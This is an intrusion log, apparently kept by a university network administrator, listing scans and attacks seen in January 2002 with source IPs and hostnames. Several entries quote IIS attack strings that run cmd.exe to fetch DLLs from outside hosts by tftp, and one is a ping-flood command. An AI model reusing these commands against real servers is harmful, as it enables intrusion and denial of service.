Short summary of some of the attacks against us for Jan. 2002 year - time EASTERN source_ip[:port] (dns name, if any) attack/scan/notes 2001/12/31-08:19:42.10 64.225.120.25 (workflowdata.com) scannet, 1 high number port per ip, 2001/12/31-09:14:11.99 64.224.115.75 (mail.non-stop-movies.com) scannet, 1 high number port per ip, 2002/01/01-07:49:44.39 209.142.8.2 () scan net, 1 high number port per machien all day long 2002/01/01-07:56:52.83 217.128.40.198 () scannet for port 21 2002/01/01-11:16:43.10 64.0.99.197 () scannet for port 33434 2002/01/01-15:15:50.49 193.252.223.99 () scannet for port 21 2002/01/02-05:41:39.24 24.251.138.48 (cx740158-a.elcjn1.sdca.home.com) portscan 132.235.2.184 2002/01/02-12:20:59.64 217.128.14.199 (AMarseille-203-1-2-199.abo.wanadoo.fr) scannet for port 21 2002/01/02-16:14:13.61 64.95.118.14 (h-64-95-118-14.epinions.com) send 1 packet to random high port on 132.235.15.56 6 times 2002/01/02-21:42:20.24 195.92.224.71 (castle-linux-03.whoc.theplanet.co.uk) scannet for port 22 2002/01/03-05:38:05.36 209.185.214.9 (WiseTec Web Solutions,Chino Hills, CA,US) scannet for port 22 2002/01/03-09:02:20.4 193.158.93.148 (Internet-TV,Stolberg,DE) scannet for port 111 2002/01/03-09:09:20.67 132.230.16.2 (tserv.iig.uni-freiburg.de) scannet for port 22 2002/01/03-10:53:28.15 193.180.245.36 (h193180245036.kommunicera.umea.se) scannet for port 27374 2002/01/03-10:59:37.04 193.158.93.148 (Internet-TV,Stolberg,DE) start of buff overlfow attacks (rstatd) 2002/01/03-12:00:23.36 130.166.52.17 (asturias.csun.edu) scannet for port21, anon ftp attacks 2002/01/03-13:35:31.46 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524 2002/01/03-17:39:48.31 217.228.237.236 (pD9E4EDEC.dip.t-dialin.net) scannet for port 21 2002/01/03-18:16:58.64 64.17.134.18 (Allied Riser Communications,Dallas, TX) IIS attack md.exe?/c+tftp%20-i%2010.60.188.60%20GET%20Admin.dll 2002/01/03-18:20:53.01 210.90.194.129 (korea crap) scannet for port 23 2002/01/03-19:47:15 65.94.227.150 (MTL-HSE-ppp201626.qc.sympatico.ca) scannet for port 80 2002/01/03-21:43:34.63 24.52.193.64 (oh-ashtabula2a-64.wre.adelphia.net) scannet for port 27374 2002/01/03-22:34:36.53 61.171.116.56 (CHINANET Shanghai province network,CN) IIS attack ..cmd.exe?/c+tftp%20-i%20132.147.101.112%20GET%20cool.dll 2002/01/04-00:18:24 207.54.149.179:1064 (as1-27.medina.apk.net 2002/01/04-01:22:21 24.91.14.145 (h006008158dc8.ne.mediaone.net) scannet for port 22 2002/01/04-03:12:59.03 61.147.45.134 (Jiangsu province network,CN) try to use 132.235.1.70 as DNS for porno sites 2002/01/04-03:32:08.27 61.147.53.131 (Jiangsu province network,CN) try to ftp to 132.235.1.35 2002/01/04-09:04:39.80 210.51.193.3 ( China Netcom Corp.,CN) conn to 132.235.1.35:21 2002/01/04-10:29:21.11 63.167.37.100 (host.transystems.com) portscan 132.235.1.1 2002/01/04-10:29:57.43 63.167.37.100 (host.transystems.com) portscan 132.235.1.2 2002/01/04-10:31:03.51 210.51.193.3 ( China Netcom Corp.,CN) conn to 132.235.1.35:21 2002/01/04-12:45:00 212.187.98.98 (c98098.upc-c.chello.nl) scannet for port 80 2002/01/04-12:49:43.04 208.11.62.215 (port0341-cvx-carlton.cwjamaica.com) attack IIS on 132.235.18.111 w/ c+tftp%20-i%20132.146.160.89%20GET%20Admin.dll 2002/01/04-16:52:10.49 62.205.154.158 (Policom Spa,Fornacette (Pisa), Italy.) scannet for port 23 2002/01/05-05:44:11.99 61.144.141.83 (CHINANET Guangdong province network,CN) 1. IIS server attacks. Specifically, buff overflow with: 2002/01/05-05:44:11.99 61.144.141.83 (CHINANET Guangdong province network,CN) 2. cmd.exe?/c+tftp%20-i%20132.97.117.43%20GET%20cool.dll%20c:\httpodbc.dll 2002/01/05-05:48:13.75 172.188.28.159 (ACBC1C9F.ipt.aol.com) send 1 packet to random high port per ip all day 2002/01/05-06:44:49.37 216.162.102.200 (www.valuenet.net) send 1 packet to random high port per ip all day 2002/01/05-12:11:26.89 65.1.34.36 (ci60832-a.galatn1.tn.home.com) 1. attack IIS server on machiens with buff overflow cmd: 2002/01/05-12:11:26.89 65.1.34.36 (ci60832-a.galatn1.tn.home.com) 2. tftp.exe/?+-i+129.2.17.114+GET\_tmp\_dmp\+2.tmp+c:/recycler/_/_tmp/2.tmp 2002/01/05-12:15:41.26 212.187.98.98 (c98098.upc-c.chello.nl) start ftp server installed by 65.1.34.36 and transfer files. 2002/01/05-19:41:29.12 65.94.227.194 (MTL-HSE-ppp201670.qc.sympatico.ca) scannet for port 21 2002/01/05-22:00:13.84 210.51.193.4 ( China Netcom Corp.,CN) conn to 132.235.1.35:21 2002/01/06-06:03:27.63 24.114.62.27 (CPE0080c6e701d3.cpe.net.cable.rogers.com) scannet for port 27374 2002/01/06-06:05:22 202.41.10.20 (Jawharlal Nehru University,IN) scannet for port 22 2002/01/06-06:05:55.04 172.188.28.159 (ACBC1C9F.ipt.aol.com) send 1 packet to random high port slow scan all day 2002/01/06-06:26:40.23 210.51.193.71 (China Netcom Corp.,CN) conn to 132.235.1.35:21 2002/01/06-06:56:03 61.33.90.126 (Media Plannet,PC Game Plaza User in SEOUL,KR) scannet for port 22 2002/01/06-08:50:13.91 210.51.193.67 (China Netcom Corp.,CN) conn to 132.235.1.35:21 2002/01/06-10:32:24.54 210.51.193.68 (China Netcom Corp.,CN) conn to 132.235.1.35:21 2002/01/06-11:47:19.72 65.1.34.36 (ci60832-a.galatn1.tn.home.com) 1. attack IIS server on machiens with buff overflow cmd: 2002/01/06-11:47:19.72 65.1.34.36 (ci60832-a.galatn1.tn.home.com) 2.tftp.exe/?+-i+129.2.17.114+GET+acxro-test.tmp+c:/recycler/_/_tmp/2.tm 2002/01/06-13:59:50.96 216.98.64.248 (colo248.naxs.com) scannet for port 13000 2002/01/06-14:34:17.60 202.105.115.141 (CHINANET Guangdong province network,CN) send 1 packet to random high port slow scan all day 2002/01/06-15:43:12.65 193.253.194.43 (AOrleans-101-1-2-43.abo.wanadoo.fr) scannet for port 21 2002/01/06-15:45:25.55 129.237.128.10 (titania.math.ukans.edu) send 1 packet to random high port 10 machines 2002/01/06-16:39:50.00 144.214.160.204 (lotus4.cityu.edu.hk) send 1 packet to random high port slow scan all day 2002/01/06-19:08:00.44 193.252.190.250 (AToulouse-201-1-4-250.abo.wanadoo.fr) ping scan of net 2002/01/06-19:08:03.38 193.252.190.250 (AToulouse-201-1-4-250.abo.wanadoo.fr) scannet for port 21 2002/01/06-23:49:56.54 61.155.161.108 (Ningbo Bird Sale CO., ltd JiangSu Branch,CN) conn to 132.235.1.35:21 2002/01/07-00:31:14.27 61.155.139.246 (Ningbo Bird Sale CO., ltd JiangSu Branch,CN) conn to 132.235.1.35:21 2002/01/07-00:54:57.07 61.155.170.20 (Ningbo Bird Sale CO., ltd JiangSu Branch,CN) conn to 132.235.1.35:21 2002/01/07-01:21:50.84 61.155.169.41 (Ningbo Bird Sale CO., ltd JiangSu Branch,CN) conn to 132.235.1.35:21 2002/01/07-01:58:44.92 80.11.172.234 (APuteaux-104-1-4-234.abo.wanadoo.fr) scannet for port 21 2002/01/07-05:51:02.76 61.177.61.242 (CHINANET Jiangsu province network,cn) 1. start scan/attacks of iis servers with buff overflow 2002/01/07-05:51:02.76 61.177.61.242 (CHINANET Jiangsu province network,cn) 2. tftp%20-i%20132.232.9.18%20GET%20Admin.dll 2002/01/07-05:51:04.95 208.11.62.132 (port0258-cvx-carlton.cwjamaica.com) attack IIS w/ tftp%20-i%20132.146.160.89%20GET%20Admin.dll 2002/01/07-05:58:00.90 172.188.28.159 (ACBC1C9F.ipt.aol.com) send 1 packet to random high port slow scan all day 2002/01/07-07:14:48.86 132.230.49.56:21 (webcam.vwl.uni-freiburg.de) scannet for port 21 2002/01/07-08:54:09 128.192.32.20 (dinky.fcs.uga.edu) scannet for port 22 2002/01/07-09:52:15.75 193.251.180.86 (AReims-101-1-1-86.abo.wanadoo.fr) scannet for port 21 2002/01/07-10:11:32.48 147.106.36.7:21 (bulldog.desales.edu) probe port 21 on dns servers. 2002/01/07-10:43:41.34 216.244.152.250 (mail.clinicasanborja.com.pe) scannet for port 21 2002/01/07-11:50:57.07 148.223.55.140 (customer-148-223-55-140.uninet.net.mx) scannet for port 21 2002/01/07-12:16:14.92 148.223.55.140 (customer-148-223-55-140.uninet.net.mx) use finger to probe 132.235.1.1 for '6' and '9' 2002/01/07-12:16:40.46 148.223.55.140 (customer-148-223-55-140.uninet.net.mx) try to login to 132.235.1.1 as nfsmgr/nfsmgr 2002/01/07-22:19:53.63 61.147.44.201 ( CHINANET Jiangsu province network,CN) con to 132.235.1.35:80 2002/01/08-01:13:27.39 61.143.63.87 (CHINANET Guangdong province network,CN) scannet for port 111 (rstatd) 2002/01/08-02:48:39.17 64.217.181.55 (adsl-64-217-181-55.dsl.lgvwtx.swbell.net) scannet for port 27374 2002/01/08-02:58:27.65 61.147.45.142 (CHINANET Jiangsu province network,CN) con to 132.235.1.35:80 2002/01/08-03:06:53.50 61.147.45.142 (CHINANET Jiangsu province network,CN) con to 132.235.1.35:80 2002/01/08-03:08:57.64 4.61.33.207 (lsanca1-ar23-4-61-033-207.vz.dsl.gtei.net) probe port 21 on selected machines. 2002/01/08-03:26:30.54 61.147.45.65 (HINANET Jiangsu province network,CN) con to 132.235.1.35:80 2002/01/08-04:07:02.91 61.143.63.87 (CHINANET Guangdong province network,CN) start of buff overflow attacks 2002/01/08-06:01:46.34 172.188.28.159 (ACBC1C9F.ipt.aol.com) send 1 packet to random high port slow scan all day 2002/01/08-08:22:17 132.235.90.7:1031 (O.U) scannet for port 38293 UDP 2002/01/08-08:40:22 217.128.61.146 (ALille-204-1-1-146.abo.wanadoo.fr) SYN scan net for port 21 2002/01/08-11:08:43.90 64.23.60.41 (ns1.newmeco.net) scannet for port 21 2002/01/08-16:03:15.28 203.199.240.200 (Videsh Sanchar Nigam Ltd - India) conn to 132.235.17.1 ports, 23, 20, 23 (login guest) 230, 80 45 2002/01/08-16:50:09.78 80.8.16.234 (ca-ol-angers-9-234.abo.wanadoo.fr) 1. attack IIS server with buff overflow with: 2002/01/08-16:50:09.78 80.8.16.234 (ca-ol-angers-9-234.abo.wanadoo.fr) 2. tftp%20-i%20132.100.100.100%20GET%20Admin.dll 2002/01/08-18:43:54.42 80.13.220.152 (AMontpellier-201-1-6-152.abo.wanadoo.fr) SYN scan ofnet for port 80 2002/01/09-02:24:00.26 172.190.180.40 (ACBEB428.ipt.aol.com) scannet for port 21, anon ftp scan 2002/01/09-06:03:59.45 172.188.28.159 (ACBC1C9F.ipt.aol.com) send 1 packet to random high port per ip all day 2002/01/09-06:52:24.23 61.147.45.7 (CHINANET Jiangsu province network) conn to 132.235.1.35:80 2002/01/09-08:27:56 172.184.229.78 (ACB8E54E.ipt.aol.com) SYN scan net for port 21 2002/01/09-08:30:30.68 172.184.229.78 (ACB8E54E.ipt.aol.com) scannet for port 21 2002/01/09-09:12:28 217.128.61.146 (ALille-204-1-1-146.abo.wanadoo.fr) SYN scan of net for port 21 2002/01/09-09:39:52.06 216.136.75.126 (mailclt.webserve.net) 1. attack IIS w/ c+copy+c:\winnt\system32\cmd.exe+D:\InetPub\scripts\sensepost.exe 2002/01/09-09:39:52.06 216.136.75.126 (mailclt.webserve.net) 2. FTP to 205.252.89.206 for pgms 2002/01/09-10:13:42.19 148.240.168.62 (dial-148-240-168-62.zone-2.dial.net.mx) scannet for port 21 2002/01/09-10:45:28.01 200.11.182.36 (TRUE, The Real Unix Experts,CARACAS,VA) attack IIS tftp%20-i%20132.147.16.150%20GET%20Admin.dll 2002/01/09-21:44:42.88 61.147.44.194 (CHINANET Jiangsu province network) conn to 132.235.1.35:80 2002/01/09-13:47:12 194.149.242.3:22 (web.creanet.com) scannet for port 22 2002/01/09-15:50:21 132.235.238.1:1056 (admin.memaud.ohiou.edu) scannet for port 38293 2002/01/09-16:17:48 132.235.90.7:1031 (OUCOM - ohiou.edu) scan net for port 38293 2002/01/09-22:17:34.37 24.80.254.213 (h24-80-254-213.vc.shawcable.net) probe ports 445 139 137 on 132.235.201.31 2002/01/09-23:05:46.41 203.69.237.32 (CHTD, Chunghwa Telecom Co.,Ltd.,TW) attack IIS c+tftp%20-i%20132.32.1.77%20GET%20cool.dll 2002/01/10-00:47:39.99 61.147.45.4 (CHINANET Jiangsu province network) conn to 132.235.1.35:21 2002/01/10-01:53:02.84 61.147.44.210 (CHINANET Jiangsu province network) conn to 132.235.1.35:80 2002/01/10-02:46:47.60 61.149.27.252 (CHINANET Jiangsu province network) conn to 132.235.1.40:80 2002/01/10-03:13:53.97 61.132.13.99 (CHINANET Jiangsu province network) conn to 132.235.1.35:21 2002/01/10-03:40:47.33 61.147.45.203 (CHINANET Jiangsu province network) conn to 132.235.1.35:80 2002/01/10-04:41:12.17 61.147.59.75 (CHINANET Jiangsu province network) conn to 132.235.1.35:80 2002/01/10-04:57:24.41 130.161.249.59:22 (Technische Universiteit Delft ,NE) scannet for port 22 2002/01/10-05:14:24.04 193.252.190.250 (AToulouse-201-1-4-250.abo.wanadoo.fr) probe multiple ips for anon-ftp 2002/01/10-09:02:02 217.57.19.30:8080 (CDC COMPUTER DATA CONTROL,IT) scannet for port 8080 2002/01/10-11:16:00.57 61.177.61.242 (CHINANET Jiangsu province network,CN) 1. Attack IIS server with buff overflow cmd 2002/01/10-11:16:00.57 61.177.61.242 (CHINANET Jiangsu province network,CN) 2. tftp%20-i%20132.232.9.18%20GET%20Admin.dll 2002/01/10-12:43:48 216.200.130.203 (ezspider303.directhit.com) slow SYN scan of net for port 80 2002/01/10-15:28:18 207.173.145.70 (Wasatch Hosting,US) SYN scan of rnet for port 25 2002/01/10-18:38:34.27 61.11.57.127 (DISHNETDSL Limited,,IN) 1. Attack IIS server with buff overflow cmd 2002/01/10-18:38:34.27 61.11.57.127 (DISHNETDSL Limited,,IN) 2. tftp%20-i%20132.135.10.101%20GET%20Admin.dll%20d:\Admin.dll 2002/01/10-21:07:25 212.246.27.66:22 (mail.ppct.fi) scannet for port 22 2002/01/10-23:35:12.75 132.235.162.199 (dhcp-162-199.east-green.ohiou.edu) scannet for port 23 2002/01/11-00:18:37.66 132.235.162.199 (dhcp-162-199.east-green.ohiou.edu) scannet for port 23 again 2002/01/11-02:46:08.07 61.147.45.139 (HINANET Jiangsu province network,CN) probe port 53 on 132.235.1.70 2002/01/11-03:09:19.34 132.235.162.199 (dhcp-162-199.east-green.ohiou.edu) scannet for port 23 again 2002/01/11-04:07:10.34 32.235.162.199 (dhcp-162-199.east-green.ohiou.edu) scannet for ports 21,22,23,24,25 2002/01/11-05:20:41 216.78.95.188 ( host-216-78-95-188.jax.bellsouth.net) scannet for port 25 2002/01/11-05:48:57.07 132.235.162.199 (dhcp-162-199.east-green.ohiou.edu) scan net for ports 21,22,23,24,25,137 2002/01/11-08:37:00.09 61.75.93.141 (korea crap) scan ports 445 139 137 on 132.235.201.31 2002/01/11-08:43:45 212.246.27.66 (mail.ppct.fi) scnanet for port 22 2002/01/11-10:03:39.86 61.156.20.85 (CHINANET Shandong province network,CN) scannet for ports 3072 12760 1024 2002/01/11-16:59:32 143.225.169.36 (CRIAI,NAPOLI.IT) scannet for port 22 2002/01/11-19:06:27.35 202.183.234.203 (Shinawatra Telewiz Co., Ltd.,TH) scan 132.235.17.17 for port 21,22,23,512,1024 2002/01/11-19:27:05.28 129.7.235.5 (Creek.UH.EDU) scan multiple ips, 1 packet to high number port per machine 2002/01/11-22:43:23.81 202.188.104.2 (KOP (M) Sdn. Bhd. (KUALA LUMPUR). MY)portscan 132.235.17.17 2002/01/11-22:59:37.87 204.182.51.41 (COMET WAY INC.Penn,USA) scannet for port 515 2002/01/12-01:19:48.85 143.169.159.4 (wwwuza.uia.ac.be) scannet for port 21 2002/01/12-04:21:40 208.242.37.131 (Sandpiper Networks,CA,US) scannet for port 22 2002/01/12-05:09:19.62 211.138.203.66 (China Mobile Communications Corporation,CN) scannet ofr port 111 - rstatd attack 2002/01/12-06:27:39.77 212.10.223.198 (pc46198.stofanet.dk) scannet for port 21 2002/01/12-07:37:13.26 80.11.200.182 (ABoulogne-103-1-6-182.abo.wanadoo.fr) scannet for port 21 2002/01/12-08:07:27.52 61.147.45.206 (HINANET Jiangsu province network,CN) probe port 21 on 132.235.1.35 2002/01/12-19:16:21 64.244.109.154 (adsla154.cofs.net) scannet for port 22 2002/01/12-20:36:11.46 4.3.253.182 (GENUITY,MA<,US) scannet for port 111 2002/01/13-05:56:13.15 172.141.121.192 (AC8D79C0.ipt.aol.com) send 1 packet to random high port per ip all day 2002/01/13-05:56:13.15 172.141.121.192 (AC8D79C0.ipt.aol.com) send 1 packet to random high port per ip for rest of day 2002/01/13-06:08:40.19 172.188.28.159 (ACBC1C9F.ipt.aol.com) send 1 packet to random high port per ip for rest of day 2002/01/13-06:08:40.19 172.188.28.159 (pointer ACBC1C9F.ipt.aol.com) send 1 packet to random high port per ip all day 2002/01/13-06:39:22.96 207.45.201.78 (Teleglobe Inc.,VA,US) send 1 packet to random high port per ip for rest of day 2002/01/13-07:24:21.29 213.233.101.154 (101dial154.xnet.ro) send 1 packet to random high port per ip for rest of day 2002/01/13-07:37:52.35 24.116.172.160 (172-160.boicpe.cableone.net) scannet for port 21 2002/01/13-07:38:11.21 24.116.172.160 (172-160.boicpe.cableone.net) scannet for port 21 2002/01/13-08:38:33.38 213.248.106.199 (Blizzard Entertainment,SE) send 1 packet to random high port per ip for rest of day 2002/01/13-10:27:28.54 209.221.176.2 (gorecki.5stops.com) send 1 packet to random high port per ip for rest of day 2002/01/13-12:24:25.86 132.248.252.14 ((Universidad Nacional Autonoma de Mexico,MX) 1. attack IIS servers with buff overflow cmd 2002/01/13-12:24:25.86 132.248.252.14 (Universidad Nacional Autonoma de Mexico,MX) 2.tftp%20-i%20132.248.252.14%20GET%20cool.dll 2002/01/13-12:24:57.71 132.248.252.14 (Universidad Nacional Autonoma de Mexico,MX) 1. attack IIS server w/buff overflow w/command 2002/01/13-12:24:57.71 132.248.252.14 (Universidad Nacional Autonoma de Mexico,MX) 2. tftp%20-i%20132.248.252.14%20GET%20cool.dll%20d:\httpodbc.dll 2002/01/13-12:52:53.13 213.233.106.54 (106dial54.xnet.ro) send 1 packet to random high port per ip - 5 ips 2002/01/13-14:08:08.15 80.135.94.188 (p50875EBC.dip.t-dialin.net) scannet for port 80. 2002/01/13-15:21:26.13 65.84.249.101 (non-stop-movies.com) send 1 packet to random high port per ip for rest of day 2002/01/13-21:35:15.76 128.146.54.107 (slb202.oardc.ohio-state.edu) send 1 packet to random high port per ip for rest of day 2002/01/13-23:21:09.61 80.56.144.47 (f144047.upc-f.chello.nl) scannet for port 21 2002/01/13-23:21:09.61 80.56.144.47 (f144047.upc-f.chello.nl) scannet for port 21 2002/01/13-23:36:41 64.232.202.4 (ns1.starlink.com) scannet for port 22 2002/01/13-23:37:06.53 64.224.115.75 (mail.non-stop-movies.com)send 1 packet to random high port per ip for rest of day 2002/01/14-05:59:26 66.149.34.37 (user-119a8h5.biz.mindspring.com) scannet for port 515 2002/01/14-05:59:26.80 66.149.34.37 (user-119a8h5.biz.mindspring.com) scannet fo port 515 2002/01/14-15:54:00.11 24.10.166.23 (cx1180476-b.vbch1.va.home.com) scannet for port 21 2002/01/14-18:45:26.29 61.147.53.130 (CHINANET Jiangsu province network) pound on 132.235.1.35:21 5x/min, till 2002/01/14-19:09:21.48 2002/01/14-23:08:24.24 61.147.52.74 ( CHINANET Jiangsu province network) pound on 132.235.1.35:21 5x/min, till 2002/01/15-00:43:47.31 2002/01/15-00:27:19.82 216.232.46.223 (s216-232-46-223.bc.hsia.telus.net) scannet fo port 515 2002/01/15-05:52:01.69 61.147.53.83 (CHINANET Jiangsu province network) pound on 132.235.1.35:21 5x/min, till 2002/01/15-05:57:33.16 2002/01/15-09:23:22.13 62.219.204.163 (bzq-204-163.lns.bezeqint.net) scannet for port 80 2002/01/15-22:58:09.46 209.81.166.154 (d153.as1.clev.oh.voyager.net) >60 packets to 132.235.1.2 : 0 2002/01/15-23:02:43.82 216.232.46.223 (s216-232-46-223.bc.hsia.telus.net) scan&probe net for port 515 2002/01/15-23:24:08.22 61.147.52.67 (CHINANET Jiangsu province network) pound on 132.235.1.35:21 5x/min, till 2002/01/15-06:04:56.04 2002/01/16-06:27:02.01 61.147.52.136 (CHINANET Jiangsu province network) pound on 132.235.1.35:21 2002/01/16-06:32:31.57 61.147.52.200 (CHINANET Jiangsu province network) pound on 132.235.1.35:21 2002/01/16-07:39:40.10 132.68.215.99 (nt.bosmat.technion.ac.il) start of scan of net for port 80 2002/01/16-08:49:36.35 132.235.162.133 (dhcp-162-133.east-green.ohiou.edu) portscan 132.235.1.11 (arachits) 2002/01/16-10:15:16.08 132.235.162.133 (dhcp-162-133.east-green.ohiou.edu) scannet repeatedly for port 80 (arachits) 2002/01/16-11:30:03.90 62.211.25.39 (Telecom Italia Net,IT) scannet for port 111 - rstatd 2002/01/16-16:25:36.92 216.167.77.167 (Verio, Inc.,CA,US) scannet for port 6112 2002/01/16-17:59:23.51 132.248.252.14 (Universidad Nacional Autonoma de Mexico,MX) 1. attack IIS server w/buff overflow with 2002/01/16-17:59:23.51 132.248.252.14 (Universidad Nacional Autonoma de Mexico,MX) 2. c+tftp%20-i%20132.248.252.14%20GET%20cool.dll%20c:\httpodbc.dll 2002/01/16-18:24:39.97 62.211.25.39 (Telecom Italia Net,IT) scannet for port 111 - rstatd 2002/01/16-18:33:53.06 61.147.53.66 (CHINANET Jiangsu province network) pound on 132.235.1.35:21 2002/01/16-19:00:43.05 213.187.175.49 (213-187-175-49.dd.nextgentel.com) scannet for port 21 2002/01/16-19:34:06.57 213.187.175.49 (213-187-175-49.dd.nextgentel.com) scannet for ports 1080,8080 2002/01/16-21:00:28.70 132.68.215.99 (nt.bosmat.technion.ac.il) 1. start of attack IIS server w/buff overflow with 2002/01/16-21:00:28.70 132.68.215.99 (nt.bosmat.technion.ac.il) 2. tftp%20-i%20132.68.215.99%20GET%20cool.dll%20d:\httpodbc.dll 2002/01/16-22:12:21.12 200.247.113.224 (nfns02-1224.fns.embratel.net.br) 1. attack multiple ips via port 515 with std.script 2002/01/16-22:12:21.12 200.247.113.224 (nfns02-1224.fns.embratel.net.br) 2. see < http://ace.cs.ohiou.edu/~tysko/script.2002.1.17 > 2002/01/16-22:50:14.18 61.147.53.140 (CHINANET Jiangsu province network) pound on 132.235.1.35:21 2002/01/17-01:09:30.31 80.136.74.61 (p50884A3D.dip.t-dialin.net) scannet for ports 80,1433 2002/01/17-01:10:38.85 193.252.177.47 (AMarseille-101-1-1-47.abo.wanadoo.fr) scannet for port 21 2002/01/17-06:04:13.51 172.188.28.159 (ACBC1C9F.ipt.aol.com) scannet 1 pkt to random high number port 2002/01/17-06:31:40.66 61.147.52.73 (CHINANET Jiangsu province network) pound on 132.235.1.35:21 2002/01/17-07:26:54.98 205.252.46.98 (babble-on.systems.cais.net) scan several ips, 1 pkt to random high number port 2002/01/17-07:44:38.04 217.58.11.194 (MATICAD SRL,IT) scannet for prot 21 2002/01/17-07:44:43.31 217.58.11.194 (MATICAD SRL,IT) start of anon ftp attacks of machines from prev. scan 2002/01/17-08:20:05.44 172.189.114.190 (ACBD72BE.ipt.aol.com) scannet for port 21, anon ftp attacks 2002/01/17-12:34:37.05 131.211.67.101 (knagserver.geog.uu.nl) SYN scannet for port 80 2002/01/17-13:00:13.45 156.63.190.58 (lpdc.medina-esc.k12.oh.us) scannet for port 21 2002/01/17-13:12:39 131.211.67.10 (maren.geog.uu.nl) syn scan of net on prot 80 2002/01/17-14:33:19.84 208.27.68.230 (NEXTEK DESIGNS/CONAP,NEWERK,OH,US) scan several ips, 1 pkt to random high number port 2002/01/17-15:36:16.93 199.45.141.1 (frontier.net) scan several ips, 1 pkt to random high number port 2002/01/17-17:39:51.95 80.11.33.169 (AReims-101-1-5-169.abo.wanadoo.fr) probe anon ftp on several ips 2002/01/17-18:50:46.78 61.147.52.65 (CHINANET Jiangsu province network) pound on 132.235.1.35:21 2002/01/17-19:50:09.15 193.251.13.170 (ANeuilly-101-1-2-170.abo.wanadoo.fr) scannet for port 80 2002/01/17-19:51:20.64 193.251.13.170 (ANeuilly-101-1-2-170.abo.wanadoo.fr) scannet for port 80, probe scriptalias access 2002/01/17-20:36:07.11 61.177.251.95 (CHINANET Jiangsu province network,CN)ries to connect to 132.235.1.35 : 80 2002/01/17-20:57:26.60 61.132.13.120 (CHINANET Jiangsu province network,CN) >100 tries to connect to 132.235.1.35 : 80 2002/01/17-21:26:11.13 216.122.94.9 (nat-94-9.nameserve.net) scan several ips, 1 pkt to random high number port 2002/01/17-22:47:00.63 216.122.94.8 (nat-94-8.nameserve.net) scan several ips, 1 pkt to random high number port 2002/01/17-23:18:31 24.126.144.76 (we-24-126-144-76.we.mediaone.net) syn scan of net on prot 80 2002/01/18-00:38:49 24.76.217.223:137 (h24-76-217-223.va.shawcable.net) scannet for port 137 2002/01/18-01:36:17.61 132.234.76.142 (sb-staf-76-142.qcas.gu.edu.au) scannet for port 3283 2002/01/18-03:11:53.76 61.177.61.242 (CHINANET Jiangsu province network,CN)ries to connect to 132.235.1.35 : 80 2002/01/18-04:40:12.47 193.253.247.239 (APlessis-Bouchard-101-1-2-239.abo.wanadoo.fr) scannet for port 21 2002/01/18-04:40:19.07 193.253.247.239 (APlessis-Bouchard-101-1-2-239.abo.wanadoo.fr) scannet for port 21 2002/01/18-04:58:36.69 4.61.33.207 (lsanca1-ar23-4-61-033-207.vz.dsl.gtei.net) probe port 21 on selected machines. 2002/01/18-07:28:05.56 212.50.160.21 (Kingston Communications Limited,GB) scan several ips, 1 pkt to random high number port 2002/01/18-10:20:21 130.226.209.32 (Danish Network for Research and Education) scannet for port 22 2002/01/18-11:43:11.20 65.204.135.199 (Flexible Web Service,CA,US) scannet for port 111 2002/01/18-13:59:14.68 24.157.67.181 (CPE0050bae7eeb4.cpe.net.cable.rogers.com) portscan net for port 21,22,23,24...54 2002/01/18-17:25:55.35 131.211.67.101 (knagserver.geog.uu.nl) 1. try to exec cmd on pc w/IIS with buff overflow as: 2002/01/18-17:25:55.35 131.211.67.101 (knagserver.geog.uu.nl) 2 cmd.exe?/c+ping+-v+udp+-n+2000+-l+62000+-w+0+62.226.81.63 HTTP/1.1 2002/01/18-21:08:23 209.239.136.160 (d159.as0.athn.oh.voyager.net) scannet for port 48563 2002/01/19-00:34:12.73 68.34.238.15 (pcp669708pcs.indpnd01.mo.comcast.net) scannet for port 27374 2002/01/19-03:21:51.52 61.177.24.232 (CHINANET Jiangsu province network,CN) 1. attack pc w/IIS server with commadn: 2002/01/19-03:21:51.52 61.177.24.232 (CHINANET Jiangsu province network,CN) 2. c+tftp%20-i%20132.232.67.218%20GET%20Admin.dll%20d:\Admin.dll 2002/01/19-07:49:36.88 172.188.28.159 (ACBC1C9F.ipt.aol.com) scan several ips, 1 pkt to random high number port all day long 2002/01/19-08:21:01.66 65.198.68.56 (netmapper.research.lumeta.com) scannet for port 33435 2002/01/19-10:22:41 213.51.203.171 (cc139034-c.ensch1.ov.nl.home.com) scannet for port 80 2002/01/19-11:11:54.32 132.68.215.99 (nt.bosmat.technion.ac.il) 1. attack pc w/IIS server with commadn: 2002/01/19-11:11:54.32 132.68.215.99 (nt.bosmat.technion.ac.il) 2. tftp%20-i%20132.68.215.99%20GET%20cool.dll%20c\httpodbc.dll 2002/01/19-11:27:44.53 65.174.51.166 (KORKSOFT,FL,US) scan several ips, 1 pkt to random high number port 2002/01/19-13:25:37 211.58.254.12 (korea crap) scannet for port 22 2002/01/19-14:55:21.45 209.242.64.97 (freemail.vines.net) scan several ips, 1 pkt to random high number port, all day long 2002/01/19-18:44:35.39 193.152.162.145 (193-152-162-145.uc.nombres.ttd.es) scannet for port 21 2002/01/19-20:53:06 200.206.157.120 (200-206-157-120.dsl.telesp.net.br) scannet for port 22 2002/01/19-20:58:22.56 148.221.115.67 (du-148-221-115-67.prodigy.net.mx) scannet fo port 12345 2002/01/19-20:58:23 148.221.115.67 (du-148-221-115-67.prodigy.net.mx) scannet for port 12345 2002/01/19-22:14:55.75 216.40.214.203 (mail.bigtimee.com) scan several ips, 1 pkt to random high number port 2002/01/20-03:22:56 217.0.79.159 (pD9004F9F.dip.t-dialin.net)scannet for port 80 2002/01/20-05:56:57.99 209.242.64.97 (freemail.vines.net) scan several ips, 1 pkt to random high number port 2002/01/20-06:00:51.78 216.40.214.203 (mail.bigtimee.com) scan several ips, 1 pkt to random high number port 2002/01/20-06:35:52 80.13.220.143 (AMontpellier-201-1-6-143.abo.wanadoo.fr)scannet for port 80 2002/01/20-06:53:20.91 172.188.28.159 (ACBC1C9F.ipt.aol.com) scan several ips, 1 pkt to random high number port all day long 2002/01/20-07:46:32.22 61.147.45.80 (CHINANET Jiangsu province network) try to use 132.235.1.70 as dnsserver 2002/01/20-07:54:15.58 65.198.68.56 (netmapper.research.lumeta.com) scannet for port 33435 2002/01/20-11:33:06.35 24.93.183.6 (a1-3d006.neo.rr.com) scannet for port 21 2002/01/20-13:37:30.82 148.221.116.159 (du-148-221-116-159.prodigy.net.mx) scannet for port 12345 2002/01/20-13:44:34.23 62.211.188.18 (Telecom Italia Net,IT) scannet for port 111 - rstatd 2002/01/20-13:50:40.37 194.67.57.35 (f5.mail.ru(scan several ips, 1 pkt to random high number port 2002/01/20-16:24:11.78 217.128.45.211 